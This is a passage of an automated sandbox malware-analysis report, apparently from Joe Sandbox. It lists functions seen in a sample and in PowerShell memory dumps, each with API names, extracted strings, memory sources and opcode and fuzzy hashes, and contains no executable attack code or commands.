                                      • API String ID: 2709904686-224404859
                                      • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                      • Instruction ID: 4f2c6dc630764ad6ed400a220cd41f8d0a4aff102c3f5ecc88be1499634875f0
                                      • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                      • Instruction Fuzzy Hash: F7D05EB2401920DAC3126704DC04DAF73A8EF12300746446AF841A6165D7786D818AAC
                                      Function 00405CA3 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CCB
                                      • CharNextA.USER32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CDC
                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: lstrlen$CharNextlstrcmpi
                                      • String ID:
                                      • API String ID: 190613189-0
                                      • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                      • Instruction ID: b35bc10bc40a781af4b0b0b13ea0e0b48c2ad23c6ba402853768862ad0a65ea6
                                      • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                      • Instruction Fuzzy Hash: 2CF0F631204918FFDB02DFA4CD4099FBBA8EF06350B2540BAE841FB311D634DE01ABA8

                                      Executed Functions

                                      Function 02DAEAE0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \V$k
                                      • API String ID: 0-3810944114
                                      • Opcode ID: 0b5db0a9cb3dc56c380e1753ac1c34095fdf09d7085aba85bd86d7881901f2d9
                                      • Instruction ID: 9ee0f07bd49472cf3fcaa0b7616d3bc4ad57b78b39746e107519013f8fb503a0
                                      • Opcode Fuzzy Hash: 0b5db0a9cb3dc56c380e1753ac1c34095fdf09d7085aba85bd86d7881901f2d9
                                      • Instruction Fuzzy Hash: 43B14B70E002198FDF10CFA9D9A5BAEBBF2AF88314F148539D815A7394EB749845CF91
                                      Function 02DAF3B0 Relevance: .3, Instructions: 266COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5bbd227368f669e589739835e79be49e30b79c1f0fd92d93acd372e95d24efe4
                                      • Instruction ID: ea6c587d0f4b4d63a4ff231b0bf93620da0d3ab22325bfe24c33114c91661713
                                      • Opcode Fuzzy Hash: 5bbd227368f669e589739835e79be49e30b79c1f0fd92d93acd372e95d24efe4
                                      • Instruction Fuzzy Hash: 1EB16C71E002098FDB10CFA9D8A1B9EBBF2BF88314F188569D414A77A4EB759C45CB81
                                      Function 073B3CD0 Relevance: 30.9, Strings: 24, Instructions: 904COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                      • API String ID: 0-2699759020
                                      • Opcode ID: 578e145045c0b9a0b512f13b168376db76e1caab69a2201ec24c40778c922bf1
                                      • Instruction ID: fa24e4ea2da39bbeaf57706cbd5b1902f278e4be8e5fd22b2e8285930857b5c2
                                      • Opcode Fuzzy Hash: 578e145045c0b9a0b512f13b168376db76e1caab69a2201ec24c40778c922bf1
                                      • Instruction Fuzzy Hash: 5582A1B4E00259DFEB20DB58C951B9AB7B2EF85304F10C4AAD50A6BB51CB31ED85CF91
                                      Function 073B3020 Relevance: 10.7, Strings: 8, Instructions: 659COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                      • API String ID: 0-3166488486
                                      • Opcode ID: ff13de33408da8c2681a9daebf5825b5216a044dbcbef9d3466a5c8afc92823d
                                      • Instruction ID: 1d4cdb091b1bb7ac27162ba12d721d3d4b3beb476b449d266b8b1ae852c49753
                                      • Opcode Fuzzy Hash: ff13de33408da8c2681a9daebf5825b5216a044dbcbef9d3466a5c8afc92823d
                                      • Instruction Fuzzy Hash: 9432FAB4B002199FDB249B68C851BEEBBA2EF85300F15C469D5099FB95CF32DC49CB91
                                      Function 02DAAFE8 Relevance: 10.5, Strings: 8, Instructions: 522COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8N$k$Hbq$h]$k$h]$k$h]$k$$^q$$^q$I$k
                                      • API String ID: 0-297966741
                                      • Opcode ID: 8e22cd7b9ab4c15f15404e182ccf431a453258b19f216dde825df1665757f1b0
                                      • Instruction ID: d2257046645f905f6560151a0ec3ca62eacd17848776ff8ca8abdce9be18ef20
                                      • Opcode Fuzzy Hash: 8e22cd7b9ab4c15f15404e182ccf431a453258b19f216dde825df1665757f1b0
                                      • Instruction Fuzzy Hash: 5A223E34B002588FCB65DB25C894AAEB7F2BF89344F1444AAD40AAB351CF35DD86CF81
                                      Function 073B1160 Relevance: 8.1, Strings: 6, Instructions: 593COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                      • API String ID: 0-445857065
                                      • Opcode ID: 9f22be7741a91491ef8b1a9c405d7cf6c441ce47ec9039b5964d31a484f707dd
                                      • Instruction ID: 54b81a9c895c3e38fd63c33d189c9c2e782518bf531bd5cb775016b9e3ad7ae9
                                      • Opcode Fuzzy Hash: 9f22be7741a91491ef8b1a9c405d7cf6c441ce47ec9039b5964d31a484f707dd
                                      • Instruction Fuzzy Hash: 4032C4B0B01209DFE724DB58C861F9ABBB2BF85304F148469E5099FB95CB72DC45CB92
                                      Function 073BC2E3 Relevance: 5.1, Strings: 3, Instructions: 1340COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$4'^q
                                      • API String ID: 0-1196845430
                                      • Opcode ID: dc31fc6cff613c86cee170ecaa5169999caa880fd275d36af94f6a511a95d296
                                      • Instruction ID: 90654784b8017a1d9a30d57fb4755b04d85ac2d93858e655cc49f4ac027a0cd1
                                      • Opcode Fuzzy Hash: dc31fc6cff613c86cee170ecaa5169999caa880fd275d36af94f6a511a95d296
                                      • Instruction Fuzzy Hash: 55D260B4A40219DFEB24DB64C851BDAB7B2BF85304F1084A9D90DABB51CB31ED85CF91
                                      Function 02DAF11C Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \V$k$\V$k
                                      • API String ID: 0-1321503793
                                      • Opcode ID: 0049b383557d1b65ba85a1e0adde7874d910fe31acf688b3c22f4f68be38188d
                                      • Instruction ID: 4e8214cfc2ca6c0482ea12db72c70dd06afb98515cc9ff5efd301b196eed7461
                                      • Opcode Fuzzy Hash: 0049b383557d1b65ba85a1e0adde7874d910fe31acf688b3c22f4f68be38188d
                                      • Instruction Fuzzy Hash: E57157B1E00249CFDB10CFA8C891B9EBBF2AF88314F148169E454A7754EB799846CF91
                                      Function 02DAF128 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \V$k$\V$k
                                      • API String ID: 0-1321503793
                                      • Opcode ID: 37a081288eb913abbad847f4fc517e27eaa7e88f8edb9b79d87e8a814fb04454
                                      • Instruction ID: c0fd38a9fedcf3d3cd95a5b399091926787bf2c5b6684ebaa95356a7022aee1a
                                      • Opcode Fuzzy Hash: 37a081288eb913abbad847f4fc517e27eaa7e88f8edb9b79d87e8a814fb04454
                                      • Instruction Fuzzy Hash: 917167B1E00209CFDF10CFA9C890B9EBBF2AF88314F148169E455A7754EB799842CF91
                                      Function 073B0BA0 Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: tP^q$tP^q
                                      • API String ID: 0-309238000
                                      • Opcode ID: a37e1c431f4cb76ea5ba8862597efe471af63d213e572ce52ccd72ea88d62987
                                      • Instruction ID: e1ec858b59325e0a886543efa3a5bfe5e123663edebfee7ddaee64153637893a
                                      • Opcode Fuzzy Hash: a37e1c431f4cb76ea5ba8862597efe471af63d213e572ce52ccd72ea88d62987
                                      • Instruction Fuzzy Hash: C3514BB17043459FEB398A69D8007ABBBA69FC6311F14C46BD64DCFA91CB31D845C3A1
                                      Function 02DABCA0 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: h]$k$I$k
                                      • API String ID: 0-1783297608
                                      • Opcode ID: d2812c1dcbc522140b76b6f9c292aaca919145c75336fdfcaf2410acfbd738cf
                                      • Instruction ID: d0063ab485c4e1901036deb1bc1e326bba950c9633c73937803c034a9ce03cf8
                                      • Opcode Fuzzy Hash: d2812c1dcbc522140b76b6f9c292aaca919145c75336fdfcaf2410acfbd738cf
                                      • Instruction Fuzzy Hash: F431EB34A011188FDB25DB64C895AEEB7F2BF89349F1044E9D50AAB351CB359E86CF81
                                      Function 073B4AF2 Relevance: 2.1, Strings: 1, Instructions: 888COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q
                                      • API String ID: 0-1614139903
                                      • Opcode ID: d669a56279c017b0533c1f51c2e6bf409bc7916555160cfa374fa0789e08575b
                                      • Instruction ID: 46508fce6efe6854af32b81481e0eeaddde7175d7871c8da82e6ecbb9cbbed74
                                      • Opcode Fuzzy Hash: d669a56279c017b0533c1f51c2e6bf409bc7916555160cfa374fa0789e08575b
                                      • Instruction Fuzzy Hash: AC8291B4A00258DFDB30DB54C951B9AB7B2EB89304F10C5A9DA0E6BB41CB31ED85CF95
                                      Function 073BCEBE Relevance: 2.1, Strings: 1, Instructions: 838COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q
                                      • API String ID: 0-1614139903
                                      • Opcode ID: 377af6c7ad31c58984d5d8c6627c1f1da6e7a74a7f28afe485b15ebc8f3b26bd
                                      • Instruction ID: 7d40d5aadbb94fb5159367253df0bee47929fb5f14a60228baa0c716a48701aa
                                      • Opcode Fuzzy Hash: 377af6c7ad31c58984d5d8c6627c1f1da6e7a74a7f28afe485b15ebc8f3b26bd
                                      • Instruction Fuzzy Hash: F17283B4A01218DFDB24DB54CC51B9AB7B2AF89304F1085A9D90E6FB55CB31ED81CF91
                                      Function 073B3CB2 Relevance: 2.1, Strings: 1, Instructions: 828COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q
                                      • API String ID: 0-1614139903
                                      • Opcode ID: 3ebea06cfa0a1915055b34d50241c35c8135c36ddbca8ffbfbc66010eb9da8e5
                                      • Instruction ID: e7f0dab0c7c9a5befdfe8c0f3c4be16534c88af0c34d62d29028e8263d8e7fd6
                                      • Opcode Fuzzy Hash: 3ebea06cfa0a1915055b34d50241c35c8135c36ddbca8ffbfbc66010eb9da8e5
                                      • Instruction Fuzzy Hash: D8729FB4A00259DFEB20DB54C951B9AB7B2EF85304F10C49ADA0E6BB51CB31ED85CF91
                                      Function 073B4CBF Relevance: 1.9, Strings: 1, Instructions: 646COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q
                                      • API String ID: 0-1614139903
                                      • Opcode ID: 63f91f74ae44fa4e0a9901f0ab5ca1f9b6eb8fa2444734736bbd350d1a6ee0f3
                                      • Instruction ID: 8299e6868783b33e950efe3fa1dc2e9552a71f35fe462d6705059a10889c632d
                                      • Opcode Fuzzy Hash: 63f91f74ae44fa4e0a9901f0ab5ca1f9b6eb8fa2444734736bbd350d1a6ee0f3
                                      • Instruction Fuzzy Hash: 3E52B1B4A00258DFDB20DB54CD51B9AB7B2FB85304F1085A9DA0E6BB41CB31ED85CFA5
                                      Function 073BD081 Relevance: 1.9, Strings: 1, Instructions: 625COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q
                                      • API String ID: 0-1614139903
                                      • Opcode ID: 3c304a2c275f761fdadd5ecb101ffe734a5f425770762f15a9e245aa66584873
                                      • Instruction ID: 5785a5e889dad52e208bf35203e6ce2554e0577dced292221f2176cffe1ff6e8
                                      • Opcode Fuzzy Hash: 3c304a2c275f761fdadd5ecb101ffe734a5f425770762f15a9e245aa66584873
                                      • Instruction Fuzzy Hash: 604283B4A40219DFDB24DB54CC51B9AB7B2BF89304F1084A9D90A6FB95CB31ED81CF91
                                      Function 073BD109 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q
                                      • API String ID: 0-1614139903
                                      • Opcode ID: 9bd4d911919b3a666f02cf66564c7e7ac0faa8c75f97c0ca4efbbb1f64707ef8
                                      • Instruction ID: 8418d34153925afb7933a6a7fd0d4e524463f3363a91cdcee1fc8ccd688140ca
                                      • Opcode Fuzzy Hash: 9bd4d911919b3a666f02cf66564c7e7ac0faa8c75f97c0ca4efbbb1f64707ef8
                                      • Instruction Fuzzy Hash: 1B1218B4A14219DFEB30DB14C851BE9B7B2BB85304F4084A9D60EABB91CB31ED85CF51
                                      Function 02DAEAD5 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \V$k
                                      • API String ID: 0-3810944114
                                      • Opcode ID: e8997b37eab59a182dd69e731ec4f8326760580f810758cde450c5e6d6401358
                                      • Instruction ID: b03fd127f77bb592392381565ee09778bfc457dff7daa4fcd9e7d9fcec34a0ea
                                      • Opcode Fuzzy Hash: e8997b37eab59a182dd69e731ec4f8326760580f810758cde450c5e6d6401358
                                      • Instruction Fuzzy Hash: 7EB13970E002198FDF10CFA8D9A5B9EBBF2AF48314F148539E859A7354EB749845CF91
                                      Function 02DA9A50 Relevance: .6, Instructions: 562COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc11ef57125eabeb3877e8bdbffce3349022dbbc58fc6aab78426dfc365bec9c
                                      • Instruction ID: 0ac40600b8c0502c2296a873232958ea7cd7d48035a62ae05aeedb9f67f9f2eb
                                      • Opcode Fuzzy Hash: fc11ef57125eabeb3877e8bdbffce3349022dbbc58fc6aab78426dfc365bec9c
                                      • Instruction Fuzzy Hash: 9132F634A012099FDB05CFA8D594ADDFBB2FF88314F258159E805AB365C731ED86CB90
                                      Function 02DA72A0 Relevance: .3, Instructions: 313COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4508edf681c627987a261972a16078586d0d52983ebeb5c8cf4d30c6c5733447
                                      • Instruction ID: b2a167f6d787d223e7b3f964bc9359daf27caac62c15135e652a83e70475c176
                                      • Opcode Fuzzy Hash: 4508edf681c627987a261972a16078586d0d52983ebeb5c8cf4d30c6c5733447
                                      • Instruction Fuzzy Hash: F3C18A31A002489FEB14DFA8C954E9DFBB2FF84714F158569E406AB365CB34ED49CB80
                                      Function 02DAF3A4 Relevance: .3, Instructions: 262COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 454fb919ef020e199b9dd761bda36a15979c3fe9c362a28b2691dd586a4eca98
                                      • Instruction ID: 4a863e347b924b94c16f9eebc6902bde804cfc3753988ce272d4625ea81600c3
                                      • Opcode Fuzzy Hash: 454fb919ef020e199b9dd761bda36a15979c3fe9c362a28b2691dd586a4eca98
                                      • Instruction Fuzzy Hash: E9B16C71E002098FDB10CFA8D8A1B9DBBF2BF48318F188569D854A77A4EB759C45CF81
                                      Function 02DA2AA0 Relevance: .2, Instructions: 231COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0a308c2e141addfabb6a679521e247ce486fd3c7ff8889ae27db8707bf225992
                                      • Instruction ID: a800b6fbf057623f6a72dbaef5c0103439fd211c1954dade2e4c7367eae9e8cc
                                      • Opcode Fuzzy Hash: 0a308c2e141addfabb6a679521e247ce486fd3c7ff8889ae27db8707bf225992
                                      • Instruction Fuzzy Hash: 3F9180B0A046458FCB05CF59C4A89AAFBF1FF49314B24859AD815DB3A5C736FC51CBA0
                                      Function 02DA7A68 Relevance: .2, Instructions: 193COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 612075d6bb8558df55411c026a45b15cec01c053210b1b3e7f4e5f2e87ab85ac
                                      • Instruction ID: 9b020a79b26743c3349fc13bf4a5585d29a7466b4200f13e795e3f8a585373d1
                                      • Opcode Fuzzy Hash: 612075d6bb8558df55411c026a45b15cec01c053210b1b3e7f4e5f2e87ab85ac
                                      • Instruction Fuzzy Hash: B071CE70A012498FDB14DF68C890A9EFBF2FF89304F18896AD416DB751DB31AD46CB90
                                      Function 02DA7BD6 Relevance: .2, Instructions: 188COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b6d4d6389a3eb8bbe98809654c74bce8354db1f63d9b88f63af6a0ed0e200e7a
                                      • Instruction ID: 46ab0f27155ea03ee1d9f96234d25ed412f833224c86071441b7ebbe1fb98ff6
                                      • Opcode Fuzzy Hash: b6d4d6389a3eb8bbe98809654c74bce8354db1f63d9b88f63af6a0ed0e200e7a
                                      • Instruction Fuzzy Hash: 3D712970E01248DFEB14DFA5D454BADFBB2BF88304F148469D416AB7A0DB35AD4ACB41
                                      Function 073B986D Relevance: .1, Instructions: 140COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3ae3e1a15dd1ec5a8bce530020ebe05e0d875bcebfb62d08581fa5baf1345118
                                      • Instruction ID: fd89923816de255147c6f90b96feee1bd7cb2eb3e9c0e5ffe2d6125863178a74
                                      • Opcode Fuzzy Hash: 3ae3e1a15dd1ec5a8bce530020ebe05e0d875bcebfb62d08581fa5baf1345118
                                      • Instruction Fuzzy Hash: 7B418EF1B44219CBEB34977888117EABB9A9FC5214B1044AAC749CFB57CA21E905C7A1
                                      Function 02DA95A8 Relevance: .1, Instructions: 124COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4716e2b6713eb58f2b6eb67d314d9ff76e605f7496827f12a4baa356efbcd6c8
                                      • Instruction ID: a598c239e370b79fc102fb4e5c74377d5c5650e6c1a3cac1ea7ca36903fb06db
                                      • Opcode Fuzzy Hash: 4716e2b6713eb58f2b6eb67d314d9ff76e605f7496827f12a4baa356efbcd6c8
                                      • Instruction Fuzzy Hash: 04415D7090E7D59FC703DB28C9A1599BFB0BF47210B0A41D7C494DB2A3D628ED59CBA2
                                      Function 02DA77F9 Relevance: .1, Instructions: 122COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2c32062f16612b8c2f9cff22444a76e5c16c00497f384b981c7757f98efe60e1
                                      • Instruction ID: 5765c35ed9f4d819689369565c2cc41986d35f9662028fe3f050af5f5cd052e5
                                      • Opcode Fuzzy Hash: 2c32062f16612b8c2f9cff22444a76e5c16c00497f384b981c7757f98efe60e1
                                      • Instruction Fuzzy Hash: 5341A231B042049FEB25DB74C854AAEBBF2EF9D355F054468E406EB7A0CB34AD01CB90
                                      Function 073B0A28 Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4e49f5b5cf99eeb4ab0f0a424d64113d9533582430bc78cd736bebfc623f2b39
                                      • Instruction ID: 3bb8dfcbbb5246b18b710be2c7f00b99c7abe2d0d999aab54b8fa6dc61bce72f
